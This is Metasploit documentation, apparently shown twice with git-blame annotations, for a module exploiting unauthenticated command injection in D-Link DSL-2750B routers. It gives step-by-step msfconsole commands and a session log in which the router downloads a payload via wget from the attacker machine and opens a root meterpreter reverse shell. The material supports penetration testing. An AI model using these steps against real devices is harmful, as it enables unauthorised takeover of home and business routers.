documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md

## Description

This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter.
Vulnerable firmwares are 1.01 up to 1.03.

## Verification Steps 

  1. Start msfconsole
  2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth`
  3. Do : `set RHOST [RouterIP]`
  4. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp`
  5. Do : `run`
  6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session


## Scenarios 

```
msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth 
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp 
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0
LHOST => eth0
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555
LPORT => 5555
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run

msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run

[*] Started reverse TCP handler on 192.168.1.6:5555 
[*] 192.168.1.1:80 Checking target version...
[*] Using URL: http://0.0.0.0:8080/1M6nI0Or6FUiW
[*] Local IP: http://192.168.1.6:8080/1M6nI0Or6FUiW
[*] Client 192.168.1.1 (Wget) requested /1M6nI0Or6FUiW
[*] Sending payload to 192.168.1.1 (Wget)
[*] Sending stage (1104216 bytes) to 192.168.1.1
[*] Meterpreter session 25 opened (192.168.1.6:5555 -> 192.168.1.1:48989) at 2018-05-14 05:30:49 -0400
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > ls -la
Listing: /
==========

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40755/rwxr-xr-x   2554    dir   2013-03-11 07:27:09 -0400  bin
40755/rwxr-xr-x   3       dir   2013-03-11 07:27:54 -0400  data
40755/rwxr-xr-x   2482    dir   2013-03-11 07:27:56 -0400  dev
40755/rwxr-xr-x   779     dir   2013-03-11 07:27:55 -0400  etc
40755/rwxr-xr-x   690     dir   2013-03-11 07:27:55 -0400  lib
100755/rwxr-xr-x  287124  fil   2013-03-11 07:27:55 -0400  linuxrc
40755/rwxr-xr-x   0       dir   1969-12-31 19:00:01 -0500  mnt
40755/rwxr-xr-x   56      dir   2013-03-11 07:13:15 -0400  opt
40555/r-xr-xr-x   0       dir   1969-12-31 19:00:00 -0500  proc
40755/rwxr-xr-x   270     dir   2013-03-11 07:25:43 -0400  sbin
40755/rwxr-xr-x   0       dir   1969-12-31 19:00:00 -0500  sys
40755/rwxr-xr-x   0       dir   2016-10-08 07:54:13 -0400  tmp
40755/rwxr-xr-x   38      dir   2013-03-11 07:23:32 -0400  usr
40755/rwxr-xr-x   0       dir   2016-10-08 07:46:13 -0400  var
40755/rwxr-xr-x   2801    dir   2013-03-11 07:26:34 -0400  webs

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.30)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 
```
Fixing documentation, improving exploits code 2018-05-20 12:55:46 -04:00			`## Description`

Adding documentation, improving description 2018-05-13 15:04:40 -04:00			`This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter.`
			`Vulnerable firmwares are 1.01 up to 1.03.`

Fixing documentation, improving exploits code 2018-05-20 12:55:46 -04:00			`## Verification Steps`
Adding documentation, improving description 2018-05-13 15:04:40 -04:00
			`1. Start msfconsole`
			2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth`
			3. Do : `set RHOST [RouterIP]`
			4. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp`
			5. Do : `run`
			`6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session`


Fixing documentation, improving exploits code 2018-05-20 12:55:46 -04:00			`## Scenarios`
Adding documentation, improving description 2018-05-13 15:04:40 -04:00
			```
			`msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth`
			`msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1`
			`RHOST => 192.168.1.1`
			`msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp`
			`PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp`
			`msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0`
			`LHOST => eth0`
			`msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555`
			`LPORT => 5555`
			`msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run`

Fixes according to code review 2018-05-14 05:46:23 -04:00			`msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run`

Adding documentation, improving description 2018-05-13 15:04:40 -04:00			`[*] Started reverse TCP handler on 192.168.1.6:5555`
			`[*] 192.168.1.1:80 Checking target version...`
Fixes according to code review 2018-05-14 05:46:23 -04:00			`[*] Using URL: http://0.0.0.0:8080/1M6nI0Or6FUiW`
			`[*] Local IP: http://192.168.1.6:8080/1M6nI0Or6FUiW`
			`[*] Client 192.168.1.1 (Wget) requested /1M6nI0Or6FUiW`
Adding documentation, improving description 2018-05-13 15:04:40 -04:00			`[*] Sending payload to 192.168.1.1 (Wget)`
			`[*] Sending stage (1104216 bytes) to 192.168.1.1`
Fixes according to code review 2018-05-14 05:46:23 -04:00			`[*] Meterpreter session 25 opened (192.168.1.6:5555 -> 192.168.1.1:48989) at 2018-05-14 05:30:49 -0400`
			`[*] Command Stager progress - 100.00% done (117/117 bytes)`
Adding documentation, improving description 2018-05-13 15:04:40 -04:00			`[*] Server stopped.`

			`meterpreter > ls -la`
			`Listing: /`
			`==========`

			`Mode Size Type Last modified Name`
			`---- ---- ---- ------------- ----`
			`40755/rwxr-xr-x 2554 dir 2013-03-11 07:27:09 -0400 bin`
			`40755/rwxr-xr-x 3 dir 2013-03-11 07:27:54 -0400 data`
			`40755/rwxr-xr-x 2482 dir 2013-03-11 07:27:56 -0400 dev`
			`40755/rwxr-xr-x 779 dir 2013-03-11 07:27:55 -0400 etc`
			`40755/rwxr-xr-x 690 dir 2013-03-11 07:27:55 -0400 lib`
			`100755/rwxr-xr-x 287124 fil 2013-03-11 07:27:55 -0400 linuxrc`
			`40755/rwxr-xr-x 0 dir 1969-12-31 19:00:01 -0500 mnt`
			`40755/rwxr-xr-x 56 dir 2013-03-11 07:13:15 -0400 opt`
			`40555/r-xr-xr-x 0 dir 1969-12-31 19:00:00 -0500 proc`
			`40755/rwxr-xr-x 270 dir 2013-03-11 07:25:43 -0400 sbin`
			`40755/rwxr-xr-x 0 dir 1969-12-31 19:00:00 -0500 sys`
Fixes according to code review 2018-05-14 05:46:23 -04:00			`40755/rwxr-xr-x 0 dir 2016-10-08 07:54:13 -0400 tmp`
Adding documentation, improving description 2018-05-13 15:04:40 -04:00			`40755/rwxr-xr-x 38 dir 2013-03-11 07:23:32 -0400 usr`
Fixes according to code review 2018-05-14 05:46:23 -04:00			`40755/rwxr-xr-x 0 dir 2016-10-08 07:46:13 -0400 var`
Adding documentation, improving description 2018-05-13 15:04:40 -04:00			`40755/rwxr-xr-x 2801 dir 2013-03-11 07:26:34 -0400 webs`

Fixes according to code review 2018-05-14 05:46:23 -04:00			`meterpreter > sysinfo`
			`Computer : 192.168.1.1`
			`OS : (Linux 2.6.30)`
			`Architecture : mips`
			`BuildTuple : mips-linux-muslsf`
			`Meterpreter : mipsbe/linux`
			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter >`
Adding documentation, improving description 2018-05-13 15:04:40 -04:00			```